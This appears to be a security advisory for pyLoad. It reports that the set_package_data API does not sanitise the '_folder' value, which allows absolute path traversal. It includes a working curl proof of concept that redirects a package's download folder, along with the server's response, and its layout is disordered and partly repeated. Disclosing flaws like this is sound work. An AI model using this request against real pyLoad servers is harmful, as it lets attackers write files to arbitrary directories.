No sanitization of package folder name allows writing files anywhere outside the intended download directory.
curl -X 'POST' \
'http://localhost:8000/api/add_package' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"name": "set_package_data_exploit_poc",
"links": [
"http://example.com/file.txt"
],
"dest": 1
}'
curl -X 'POST' \
'http://localhost:8000/api/set_package_data' \
-H 'accept: */*' \
-H 'X-API-Key: <valid api key>' \
-H 'Content-Type: application/json' \
-d '{
"package_id": 5,
"data": {
"_folder": "/users/root/"
}
}'
curl -X 'GET' \
'http://localhost:8000/api/get_queue' \
-H 'accept: application/json' \
-H 'X-API-Key: <valid api key>'
[
{
"pid": 5,
"name": "set_package_data_exploit_poc",
"folder": "/users/root/",
"site": "",
"password": "",
"dest": 1,
"order": 1,
"linksdone": 0,
"sizedone": 0,
"sizetotal": 0,
"linkstotal": 1,
"links": null,
"fids": null
}
]
Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.
Summary
No sanitization of package folder name allows writing files anywhere outside the intended download directory.
Affected Component
src/pyload/core/api/__init__.pyset_package_data()Details
When passing a folder name in the
set_package_data()API function call inside the data object with key"_folder", there is no sanitization at all, allowing a user withPerms.MODIFYto specify arbitrary directories as download locations for a package.PoC
5Response:
Impact
Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.